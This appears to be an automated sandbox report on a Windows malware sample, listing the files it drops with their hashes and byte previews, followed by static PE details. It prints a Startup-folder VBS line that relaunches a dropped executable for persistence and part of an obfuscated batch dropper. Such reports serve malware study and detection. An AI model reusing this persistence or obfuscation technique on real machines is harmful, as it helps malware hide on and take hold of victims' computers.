                                                                                                      Preview:FV...s..3.f9.t<V...s..j*Z.N..M.f9.t.V...s.......P.J....M.....;.t.W......._^[..U.............S.....SPQj.....I.P....I.S......3.Ph....S....I.P....I.8].t%...I.PP......PS......Ph.tL...........h..........P......PS....I.[..U..SVW3..Sh....j.Sj.h...@Q....I......u.2..&9].u.WS...}..Su.SW..WSV....I.V..`.I..._^[].SV..45M.W....T...j.h!.F.V..|.I.;.t.S......_^[.U..Vh.....L.......$....V.u.....I.f.>.t.W.45M.V...&...h..I........_V.....Y3.@^]...U......T...V..V....I.f.|F."t*V....I....u!.D$.PV....I....t.P....I..D$......^..].U.....E.SVW....PW....I.....u.2.....V....YP.E.3.VPW.E...|.I..u.V..g..3...j.Z.........Q.[.....h0.I.W..g..h0.I.V.jp.............h8xL.W.Z...h0.I.V.B.......uj.E.P.E.PhXxL..u.....I...t,.E..O j..0Vj.Z.....j.....O(Vj.Z......u......h.xL.W.....YYh0.I.W....VW.........VW....YYh.xL.V.g..YY..u*j..G PS.k....u.3.f.C.....W..............E.P.E.PW.u.....I...tXh0.I.V.so..YY..u).E..P..H....P...Q...P...Rh.xL.S..........h.....u.S........3.f.......E...u......W......E.YY_^[..U......./<..V.E.

                                                                                                      C:\Users\user\AppData\Local\Temp\Midnight.pps

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):3607
                                                                                                      Entropy (8bit):7.945429391114646
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:96:rWaLA34MR+2UsUlyKzJpZjuwa+Ys2rKzPJnW:rWaLL7Znulhs2ryI
                                                                                                      MD5:942045B671FE3FCF91DDAC5473424385
                                                                                                      SHA1:DC7B9A8C7C5D3596745BE35E47DE31B81FB1E64C
                                                                                                      SHA-256:7272B2939544ACE81B7CCCD8884C4E5C84A5FDDFEE53F01350B016FE26B2E2C2
                                                                                                      SHA-512:63A3C48D9760CBCA465B4F860B2AD4ED6F84AFE009FE4F623E4D301109FA1395E4C343ED4E18847CD1463A26BE58499BF3E6E88DE4179C89966B69C1D488D61F
                                                                                                      Malicious:false
                                                                                                      Preview:.o2.w .zZ=.%....:....X..{[..$.c....x.... ..Ie5J..m...`=.m...|.eP....`.@.......I...~....f....(.qp..=...E..%w.5..}....*.t.#..f..I...."A..[.:....v..#...Q#$..7.=.G7!.Dr...[.a/.6.+.....iO.......p..V.<z,D...l....4.......4.].Y.=C|6.>-..6y...._..4wt...X0...".....r.q..gK.#@[.<Y....o..qN.R.O..~.B.9..."|...d.\h.8nr.:.@....<......#......n..z.....6x.......&...@...x....7.57.C/P`p....;..aH.V...z^.}.......r.y..:6eTzf..o,...D.....,.Sz..).Go...b?.c.M....3.2..FNq$.....ys.3.@ j...7.!..`..G...G.......u.......|..eY...Bo.....$...~.#..b.......w2Hf.......SC..yM.'Bp.[...../F.o..^..........i...cI#....u...Li....Y..{C.a.....lv..;.y.F>p...I2...).&..V4j..#...U\.lHj>0\.Y..)...............Q..pV.%|....._;....}C.+i..C..[`..\.DI7.6...............B....x..1Hk()..........'.6$..[.z>].|.#u.C..q<Uq..o...DE5.r9.....$ZC...fWz..K*e...G..R3.q....V..r.&C..h.x#}...Hv.H1I.u..$z..l.1. O?.>y..O..l8........I .C6....e:.B....F..{.".ce....-.../&..<...V&..4i.....+....p$.J"......P7.l

                                                                                                      C:\Users\user\AppData\Local\Temp\Plants.pps

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):61440
                                                                                                      Entropy (8bit):7.99748761872078
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:oRiLqZ60gu4rzJHgJvr6x0fwZAUFXlNHF:2lZ3gu4gOx0gtbF
                                                                                                      MD5:7F6C343C22BA98AE47DB13A22F7E4DEC
                                                                                                      SHA1:84BE0648F3783F1DFDB12DEF62296D7EBF84DC9E
                                                                                                      SHA-256:5280B6B766FF0FC17B1D55ABC3B3698172897489B060460F31CCC653B5E76594
                                                                                                      SHA-512:E91F74D1D1988A3FD500539716C91AEC35487B89F70BC69803CC79C01642D7EB8FD69DF8B75338DDE2BB2E8BBB5CBBEC6E667536B844A6AFAD87BEC9466B6FDD
                                                                                                      Malicious:false
                                                                                                      Preview:E=...,B&~...b..g&..Zx..w.."tX.R.NO~.. >`].4.R.........&.!x$d.....6.R..a.0M#@......'..Y.+.tC,s./.`.m..............D..-w:uO... .........`.=?.CvQ.....-....\%..v.v..."...D.`.r...p.$v.6D4...?%.....#.*..>..........O.;C\.!1K\T...o"Qx...z.q...^^.....1=.bI..q...V.....v..4.........Z.G<......g..`M...:.L.Rw..A.&..j'.3./.M.X....W..F...}.........m..1.s..?...`.^e.Y..`W.j.d..#.w%.9...*..V...MdM.... ..#)$.v5.Cp..a.~U...umL.dN...B..c....k*.n*g0...5..b..=)..K.[2Z.,d:;.i.8.b.}\.B<R.e.Y..w...n......G.,R.4..EP........-7Z.@!..\..-..kl/...6n....#.o....s.^Z.r.v..G..1.q.....=".[Y$ai3n...+y{../^..5.mc...........$..D..`....7......@.].q..X...]..o....T...d..........>.........s/u...s..F .{~...C_.rg;B.K|Nu..y.....w..x...QL...i..r...@3.:...M..SZJ.1.a.4{....Y....S..........ls\...Q..8.....+WI.3hH..l...W..>.......p[....[U~.c.q.O........w.#.l2wn..*.\..p...$E..[}...!{&..,.3~.>..+...gE3.7..E#...B.i.B.!.S.Q...^....;.#...6..by0.....B<..........WS. p....mD.*.?.

                                                                                                      C:\Users\user\AppData\Local\Temp\Sad

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):52224
                                                                                                      Entropy (8bit):6.234323020106327
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:OPp7HE+tKA3QkvyNf7Xw2U0pkzUWBh2zGc/xv5T:OxyA3laW2UDQWf05T
                                                                                                      MD5:CFA08043CEF8B8A5297E3B2FA8B1DFA4
                                                                                                      SHA1:45A0C64AA8DDA50905EF554639B950F2723DBC96
                                                                                                      SHA-256:C87A9139A43842D3F7544A38EBC4535F956A22C1D6B94DEECFD2F67B7950BD7A
                                                                                                      SHA-512:1D158DDDE042796F3A2E9C31BF4F4D9ADA619B6ED98960E962D2FDAD229CC347D2FEFD52793F94F3C88A6FEF201FF803755468379A8901389C798DEA8C3FD704
                                                                                                      Malicious:false
                                                                                                      Preview:....L.........L.........L.........L.....f....L.......L...I.....L...G.....L.........L.........L.........L.....f....L.......L...I...$.L.#.G...(.L.......,.L.......0.L.......4.L.....f..8.L.....<.L...I...H.L.7.G...L.L.......P.L.......T.L.......X.L.....f..\.L.....`.L.x.I...l.L.K.G...p.L.......t.L.......x.L.......|.L.....f....L.......L.l.I.....L._.G.....L.........L.........L.........L.....f....L.......L.D.I.....L...@.....L.........L.........L.........L.....f....L.......L.X.I.....L.s.G.....L.........L.........L.........L.....f....L.......L...I.....L...G.....L.........L.........L.........L.....f....L.......L.X.I... .L..G...$.L.......(.L.......,.L.......0.L.....f..4.L.....8.L...I...D.L.u.G...H.L.......L.L.......P.L.......T.L.....f..X.L.....\.L...I...h.L...G...l.L.......p.L.......t.L.......x.L.....f..|.L.......L...I.....L.s.G.....L.........L.........L.........L.....f....L.......L...I.....L...G.....L.........L.........L.........L.....f....L.......L...I.....L.+.G.....L.........L.........L.........

                                                                                                      C:\Users\user\AppData\Local\Temp\Sandwich

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):89088
                                                                                                      Entropy (8bit):6.6670143690546135
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:1536:CjKu2IwNnPEBiqXv+G/UXT6TvY464qvI932eOypvcLSDOSpZ+Sh+IB:CjccBiqXvpgF4qv+32eOyKODOSpQSv
                                                                                                      MD5:EA7622D5B1F6D81ACD0BF7263F192DAB
                                                                                                      SHA1:23EBDC91257ED70DE3E3FC13D1FAFFB7477CBDDF
                                                                                                      SHA-256:09FD659122957DC4E92B6ED7EC7C92E99305EF411A8C8FB24C9BC292CC30A1C8
                                                                                                      SHA-512:3C5BDDD747D21B0FBFBE20B5A65964BC9CDC0D3BE243A1080C91177552CDE7CCA5A085699E1285E0B218E53A138F20A24E4AD3306C18D5216E07E547A483DDD0
                                                                                                      Malicious:false
                                                                                                      Preview:$.....<...i....... ....................%8.M..s..D$......%..L........f.n.f.p.............+......vL..$......$.....f...f..G.f..G f..G0f..G@f..GPf..G`f..Gp.................u.....%..L..s>f.n.f.p.... r........G... .. .. s.......tb.|.........G..D$..........t...G.........u.......t...............t ..$.............G.............u.D$....S..QQ......U.k..l$....(VW.{.3.....M.f;.u..C..A....=4.M..........%....j.^=....w.....+j.f......Z...f.s..f....3.f;.t.........u.M..S...%....=....w[f.:c..v.....M.........f.:c....J.K.....M.%....=....w=..%....=....w/...f.:c..q<xA.M............3.f;...w...f;.t........e..f9E.t.f9.u.........z......J............f...K.j.^f.n...p..f.p....%....=....w'....(.f.u.f.u.f...f.....u............A...3.f;..........f;.ul...%....=....wA..%....=....w3.......(.f.u.f.u.f.u.f...f.....u......................e..f9E.t.f9.u......{....B......g.S....f..tZ.e.....+.E.j.^f..t'...f...........8...+.E..M.u...f9.8u....M.f9........{.....E....f..u.3._^..]..[...........WV.t$..L$..|$.......;

                                                                                                      C:\Users\user\AppData\Local\Temp\Sexually.pps

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):58368
                                                                                                      Entropy (8bit):7.996991746747032
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:6PuWVlPEvZpbgnWCpEDl415vKMQJt1LdFvmUM+HdvW:KlPEnbtDWCMQ3VqUM4E
                                                                                                      MD5:0C08BC2F3B8319469EB612977D664F9E
                                                                                                      SHA1:051499B7D2A2A40F13478BF0F40AFA418A856A5C
                                                                                                      SHA-256:9FEDBD979DE8E370875253C5B93CEE72B7BA526553AA34A7956C91AB7E7B0E34
                                                                                                      SHA-512:4490B4A431DC5CF07D54C7CC0371FE0D6400878FBC84B857CC14EAF936B394269C99AF136986968283999AE8E4B5E284DE980BB9B35697EB8E55443586AF488F
                                                                                                      Malicious:false
                                                                                                      Preview:..:..Np..<...M.eA....mG...Dz.<.#E1..W/.%.,....@.m.V.h.3....W...5.q.7fE..w....>{`^.e.l...&vQR....q....6y.m.d~[].K.BL.P.s#....+..'.TaC...........)f.h3.4b...W.E..H.~.]......E$.>-N.Q/:.4...= R....9..I....:....R/..i..b..0.[V.N+.nC.j.F.D.7/...5.8..5.0...R../...H,.CTy.qL$.....~(Rx.j@....FD.....)c.u.Np....iK.......d.:...?4.mn...s^.e.O.+%"....-5....u.........).?F...X.-O.".y......z(-....f..gd....2......D..J.F...!...h.....!..X..Z...l{....d.`...v......T......5.n..o.......~....6.Oe...V..Z.U..Y....,9U.N{...*.;E...}e.W.7..(.."8.Y..;..x..4e.\.d.~.C..m...e"......&jI7..XU.[&...Aq....H..uT..),.,..Qg..I..i._...&.._.}....T..].q....xh....T....oq...../]..D!:.>N.?w.b....H@.W.|.8.&V\...(......'...!.5.....%.}...!.hbq.Pt....|.z..;i.{....'.u...!29;.....Ao7..@V\\..x.'#..j.iQ...a.LT....x.a1......^.....1....`NL...&..YK.......$dl....[BW.Y...%.W.......n {+..U.k.............B+u6......2......{.r^.....+.q.....V..t..C.q)..Z.....P.._+.B..t...B.r .G...h..F...O4..V.*....|

                                                                                                      C:\Users\user\AppData\Local\Temp\Taught.pps

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):94208
                                                                                                      Entropy (8bit):7.998172729983325
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:XrCa/JlgGvyejmuFqcKlO984yX1/qrHQ5IO71yzORyIzA3Fty:Oajyej3FqcZjyX1/qDQnZy6Yy
                                                                                                      MD5:D0852ADE083A33B48504B1EC9659A02D
                                                                                                      SHA1:6755B58E05F943F39AFFF4766D9BD1B3465FCB42
                                                                                                      SHA-256:6FE8FE5FDC6679402DC98405FE20C15673D504A278DB93C7AA3977549FF37FDB
                                                                                                      SHA-512:31C7D3F47F87167D6B4DB381150AA00F4BBB4A195CB8DE8F3BDCF7323F00C9B61072FB4066DE3923060C1B8E6C1EA4A34B6BAAE9DE6D4EFB15CCB9B457B1A2EB
                                                                                                      Malicious:false
                                                                                                      Preview:....YJ..%6.Z..#j!.bI.p.y.x0..'?.g..Er.+:.z~..J+....fi..W..L........r.q..m...o.n..d.......cjk...1f...o{..?...Fw..)..jY.Y.X.".Fq8..{>..<>6=`..n..v..w`.).......0.X.B..T~GM...0.n-../8).C..@F...n~....8..GN.._.n........s;b...NJ.qB.W.DXa....q.`.....'...:.C~..!..?X.yRG.F...36....I.3b+#p..P....C...x....!l;.XR....Y.H.!>.Gf.k}....uY..&..V.....w&.'.g.....Y...Vd.k.2....(....!..m... Q......zc.d.....z]oP..sC..~a..v.N.....b.M}....*.S...J.j......<*..j....H.../...%(O...X.L......`.?S...9.0.-{qn;.T.......%.......Q{z..%.Qv.....T.(@Si.)u..H..G*.....e..x.S...T.'D..\pf,.x..s...+...cFh.y.ZUE....\8._91~mW.......h.9.~..........%q.........R..j.zno.T<..<..?<:0.t..g.F..h.L."....K..5...?...(..F...B....s.'.6X.....Py..w.`....tl.,.0$+r.ZXVR....H.a;qp)....wEZ.xn.......s./....... ...@.......g.....P:...M.e.}'.#.#..@..EYf>..~.Y....S.G...-%N=.W9o.%...h.Je...5......].(...R.. ....b.3.b,.vIb0n..;.l.'$......d=..F.`....M..>;X.d..p....U....r..}.....(.Z.6..#-..`.K..Z9.....@..o-

                                                                                                      C:\Users\user\AppData\Local\Temp\Technical

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\extrac32.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):52635
                                                                                                      Entropy (8bit):6.894883817009482
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:768:F2+9BGmd9OTGQ1Dv7sMvLHfR/ZByLiFuO/ChgZ45VatJVEV3GPkjF:F2+9BGmdATGODv7xvTphAiPChgZ2kOE6
                                                                                                      MD5:F75CDA1169A4832103F513B1E4EFB873
                                                                                                      SHA1:A30238168642366A2E681C6DA4AA91DA09EE95AF
                                                                                                      SHA-256:6615FFF01D501F1B0138B7D0E245CA159274ECA72960BAC04AEB96BFC0040D24
                                                                                                      SHA-512:115BC77E48FB7077A19DAADBA8EB4666821C73ECC280DA209716C1F783FA635FF72B1F42FEFC841C30D2152B67884BECA0DD92C7D69A1B762DF1F142AB21256B
                                                                                                      Malicious:false
                                                                                                      Preview:.]...]...]...]...a......................................................]...]...]...]...]...]...]...]...]...]...]...]...v......................................]...]...]...]...]...]...]...]...]...]...]...]....................................k......................^...]...]...]...]...]...]...]...]...]...]...]...]..................................d...]...]...]...]...]...]...]...]...]...]...]...^........................k.....................................]...]...]...]...]...]...]...]...]...]...]...]...^...........................v...]...]...]...]...]...]...]...]...]...]...]...]...................................................................e...]...]...]...]...]...]...]...]...]...]...]...]...^.................l...]...]...]...]...]...]...]...]...]...]...]...]...d......................................................................^...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...]...].................................

                                                                                                      C:\Users\user\AppData\Local\Temp\Utilize.pps

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\AppData\Local\Temp\update.exe
                                                                                                      File Type:data
                                                                                                      Category:dropped
                                                                                                      Size (bytes):91136
                                                                                                      Entropy (8bit):7.997887140786868
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:1536:F+S6F2im9NpPmF/7WLO53J4HTfMRQLNYFhcbuasnW1e5OX+SUjNvEtFP:Z669NFmQLk3J4Q4KFhe4ZsY9Ev
                                                                                                      MD5:0584941C1E669F89B9BF46C3D2DD69B6
                                                                                                      SHA1:C9E1F05D75A4C46AEFF851AABA1365AE0EFFDB28
                                                                                                      SHA-256:5D062E3FA5F74AA3D0FE500E1E0F226E869631D9275D2EC3536D3EC5065636F6
                                                                                                      SHA-512:532DEB70A1EEDFA86049328C4B5785BF13ABB5A077674F9E58D58198678D577AB304634D91A4AD79F7335D0FF2CD815C4A2218FD87A8B4D329AF634AEDE6C58D
                                                                                                      Malicious:false
                                                                                                      Preview:.B.<...4@>.......5.~d..[....F.~....k.fW.F@Y...}..;*.1+g'.....b.x..C.UO..r7$..`.L.....q.[.M{..R...Q9.X....Cf*.f.........:a.R...V`.x.........:...]n...hR.Xh...q.b).|b...m. ...ZSv..c..........'..#..noW.&B.H....#....J]...6.M[..'..Hq........=.:.}.{.U...!...P[......R.tN]~..8.mg|.."..T.|...g_.....(mFYdev3.$p.y@...u ...@$.....Y%..>.G^./' eW..HK..lJ..LS...H}AU3!EA06M..s$.<.z..g....kC.R.....:!.)......@...F..k;!..u:.=..3............d.a.Mb...l.t.jxI..8.v...r.T...txH..!..)98O...,.XOg;Mm.=..A..FPWW.....Y...$c..F.Kx...i..f3.H....2)...<.9.m....&...4....Rx...G.N.'.F...h................P..T...P..TkC.R......%x....}...q..U-...(....%....V..?p.hf..........@.#....{'.l..v..*)~.K....dC`:.......c!.).A.&!0..~..}..h..w14.h.%.!4.A...V..+}.,{{.s.x..K....V.E...`.[..r....R..,P..Myn.2..t.W....v-...f"...........S...P..Tm........~..5...x..2).U.j.....>.P#.~.|.......|..TD..u-....L.......G..'.}...?.....*op...aV.-Bt...Z.S.!x.....u.I u.......O...7.3..wVs...?L.75.o..M.`^.?X..r

                                                                                                      C:\Users\user\AppData\Local\Temp\expensive.pps.bat

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\expand.exe
                                                                                                      File Type:ASCII text, with very long lines (587), with CRLF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):10160
                                                                                                      Entropy (8bit):5.200334067396374
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:192:J4G/8NCcRaBLEquWTK1l/ZzlKTSmoDwkeazvXD7AgOSHNmLWDSXimR:yG7cRU9uThxKTSNwkDvAyfCR
                                                                                                      MD5:D7ABF909D592DACFB1FAF1169A4167CB
                                                                                                      SHA1:D0E61DD874998B1BB63898BB668DC70DF1D391EC
                                                                                                      SHA-256:33FE0DD98D7E0A161F67FB2F2916606BC5F455BC2A2D85365384A03C0142AB1D
                                                                                                      SHA-512:E024AFB654123559056BD7E205AF88CA2D21E37449168B79C2A81C6F8D6C3A54EF9BC5315631C65B7B8FA1001A8A7301C54BEABEB58646EA6533452DE7739E4B
                                                                                                      Malicious:false
                                                                                                      Preview:Set Coding=5..XiMhMom(Turns(Matters(Remove(Spirits(..QNGuns(Cartoons(..stAVenue(Snowboard(Giant(Seemed(Petroleum(..kXGtDays(Shark(Covering(Pens(Newspapers(Nu(Larry(..yyGuarantee(Things(Nearly(..ZUFutures(Receive(Iso(Separate(Championships(Abstract(Examinations(..Set Condition=u..zitForward(Employees(..gunImplement(Ben(..yuElder(Tables(..uYYZWorker(Letter(Lighter(Command(Spots(..VWvSummary(Magnitude(Msgid(..ySoQPounds(Rj(Operational(..ObBoutique(Troubleshooting(Housewives(Deadly(..Set Replacement=6..TwjRussell(Bunny(..GSGive(Biggest(Zambia(Wikipedia(Computational(Injuries(..YwAutomobiles(..eoConsistency(Epic(Dealtime(Symantec(Car(..EnATested(Registered(Assure(Dead(Image(Estimate(Synopsis(Pulse(Respective(..Set Commitments=2..eXTJSupervisor(Movements(Unlikely(Panasonic(..FAZSaw(Lots(..ICFvBone(Breeds(Edmonton(Bath(..oXXsWebshots(Tired(Wagon(Wifi(Characterized(Recreational(Reveals(Consequence(..tuSmell(Limits(Drama(Shadows(Usual(Years(..tIePk(Springfield(Retreat(Hair(Equipped(..cZArchitec

                                                                                                      C:\Users\user\AppData\Local\Temp\update.exe

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\00000123.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                      Category:dropped
                                                                                                      Size (bytes):1506576
                                                                                                      Entropy (8bit):7.984919236743842
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:24576:qIN7Rt3trXPzxgEnhS0qIztOziQuo+c5NoRg686Pq540M5gQ:X7z3BfVgEn8/xziQyceq540M53
                                                                                                      MD5:5A69E7FBEB1781A8AB7F77E74CABDB96
                                                                                                      SHA1:287D758BB4017D299A17D171576FD580C77A1E41
                                                                                                      SHA-256:1F73940187D32E928024C8806175070F11633C3FC6D0B62D9847726FD1561A0C
                                                                                                      SHA-512:661369E913231A3DFA7FEDCA627A3308403DE96D330783AC0B54059BE6AD22F65626E89DCFE74083DE3E54B5C4E7DE1DCE950E920EBA801EF6649A07711CF028
                                                                                                      Malicious:false
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8............@.......................... ............@.................................4........@..........................d....................................................................................text....m.......n.................. ..`.rdata..b*.......,...r..............@..@.data....~..........................@....ndata.......0...........................rsrc........@......................@..@.reloc..2...........................@..B................................................................................................................................................................................................................................................................................................................

                                                                                                      C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\updatte.vbs

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\00000123.exe
                                                                                                      File Type:ASCII text, with no line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):83
                                                                                                      Entropy (8bit):4.731622226601045
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:FER/n0eFHHoUkh4EaKC5kcAJHHn:FER/lFHI9aZ5NMn
                                                                                                      MD5:F5CC202FB628BF64337F34D21E0FA2CA
                                                                                                      SHA1:018C3DF9194593D6268433E0A1A9F7A03AF1B43D
                                                                                                      SHA-256:C66132A8F1DE267239706819C0440D3BE62A0A89BC1020002F64119AEBE18D7D
                                                                                                      SHA-512:E3556C597F879D02EFE972E1381F91E401345DC57D81385FACCFDB5A6751659B2BC0AF8FFC87711A6E79F2494A69F032F92AED654A82B15DF9E5F5F874852A4B
                                                                                                      Malicious:true
                                                                                                      Preview:CreateObject("WScript.Shell").Run """C:\Users\user\AppData\Roaming\updatte.exe"""

                                                                                                      C:\Users\user\AppData\Roaming\updatte.exe

                                                                                                      Download File
                                                                                                      Process:C:\Users\user\Desktop\00000123.exe
                                                                                                      File Type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Category:modified
                                                                                                      Size (bytes):265687064
                                                                                                      Entropy (8bit):7.99994576318128
                                                                                                      Encrypted:true
                                                                                                      SSDEEP:
                                                                                                      MD5:33E8BFF35AE882BCA693ACBAF7258CFB
                                                                                                      SHA1:BEA96AA97F6883506874DB891AD81A341DB6FD1C
                                                                                                      SHA-256:ED52560903EF940351449AC20E784416060D8B0E6B0D56C70FCFCD73642BA02A
                                                                                                      SHA-512:D4BE509E87E940DE6C2A20D4741C5DFEBCB74B3739D5C97C356278B8B21210C568E127A8FB81C40C9F98F26F826D3829FA59D0ABF23CFBA558F096B26DCA7786
                                                                                                      Malicious:false
                                                                                                      Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@5.g..................5...........5.. ........@.. ....................... 6...........`.................................X.5.S.....5.......................6...................................................... ............... ..H............text.....5.. ....5................. ..`.rsrc.........5.......5.............@..@.reloc........6.......5.............@..B..................5.....H........*1.............T....z,..........................................0..........(>...*.*.0../.........(....}.......}......|......(...+..|....(....*..0...........(....o.......(....*.0...........{......&..,8.(....o.......(....-?..%.}......}.....|.......(...+.....{......|............%.}......(....(....(....(....(.... 1...(2...(.... ....(2...(......&........}.....|.....(.........}.....|....(....*............................6.|.....(....*...0..7.........(....}.......}.......}

                                                                                                      \Device\ConDrv

                                                                                                      Download File
                                                                                                      Process:C:\Windows\SysWOW64\expand.exe
                                                                                                      File Type:ASCII text, with CRLF, CR, LF line terminators
                                                                                                      Category:dropped
                                                                                                      Size (bytes):182
                                                                                                      Entropy (8bit):4.653929944113698
                                                                                                      Encrypted:false
                                                                                                      SSDEEP:3:RGXKRjN3MZ9aSLKLbzXDD9jmKXVM8/FAJoDYTzMc0LVUR1VA0LVakdoAXlLVOFU3:zx3MmSLQHtBXVNsT90hD0hHoAXlhSWK+
                                                                                                      MD5:386B8F69E563559183EC6B8A68E3D72C
                                                                                                      SHA1:B4FD86EDD05B29E0C817F14398DDD58BE9F3A82E
                                                                                                      SHA-256:6D780FAD249F3D95B71A7DDCE894E39F61E4FAA3DB26B4C9141197E44F402666
                                                                                                      SHA-512:38C5A26B83897602F503780FBDEF9EE3F3F81D398D4950950D5C3C07663F7D6B9D6BF7BB5CCC8A8ABB0CABAFC36EB513C74C11394C60CAA42ED40248A8FE4E1D
                                                                                                      Malicious:false
                                                                                                      Preview:Microsoft (R) File Expansion Utility..Copyright (c) Microsoft Corporation. All rights reserved.....Copying expensive.pps to expensive.pps.bat...expensive.pps: 10160 bytes copied.....

                                                                                                      Static File Info

                                                                                                      General

                                                                                                      File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                                      Entropy (8bit):7.8771308481254145
                                                                                                      TrID:
                                                                                                      • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                                      • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                                      • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                                      • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                                      • DOS Executable Generic (2002/1) 0.01%
                                                                                                      File name:00000123.exe
                                                                                                      File size:3'520'000 bytes
                                                                                                      MD5:20ab8d93805914ee4e7c7953b15928a5
                                                                                                      SHA1:f752bf44c2e7d86f05b9e9c25e3cc96faa190a04
                                                                                                      SHA256:e428c6fe9435b8c7aee48825abcd62916d8b4706c2877c94d01c4691387c7acf
                                                                                                      SHA512:1684b0429c80e38873dfd2d79d8b4c548f19e68d4ef530efb830e3a812bb92d87479b43598c68496748a0c3f7e1cdb3915bcb5b5e1b60d82c134d98e07587a99
                                                                                                      SSDEEP:98304:rF8hGgMqugXfoSjy8C4B1ou01ZcYmidZt:rFgrnPouJBau01ZcYTh
                                                                                                      TLSH:A6F5029B73A8F71AF43EA6B1E052949B07F9D20A72D1FB7FDE009F9418437421A19067
                                                                                                      File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L...@5.g..................5...........5.. ........@.. ....................... 6...........`................................

                                                                                                      File Icon

                                                                                                      Icon Hash:90cececece8e8eb0

                                                                                                      Static PE Info

                                                                                                      General

                                                                                                      Entrypoint:0x75cbae
                                                                                                      Entrypoint Section:.text
                                                                                                      Digitally signed:false
                                                                                                      Imagebase:0x400000
                                                                                                      Subsystem:windows gui
                                                                                                      Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                                                                      DLL Characteristics:HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                                                      Time Stamp:0x67C53540 [Mon Mar 3 04:51:12 2025 UTC]
                                                                                                      TLS Callbacks:
                                                                                                      CLR (.Net) Version:
                                                                                                      OS Version Major:4
                                                                                                      OS Version Minor:0
                                                                                                      File Version Major:4
                                                                                                      File Version Minor:0
                                                                                                      Subsystem Version Major:4
                                                                                                      Subsystem Version Minor:0
                                                                                                      Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                                      Entrypoint Preview

                                                                                                      Instruction
                                                                                                      jmp dword ptr [00402000h]
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
                                                                                                      add byte ptr [eax], al
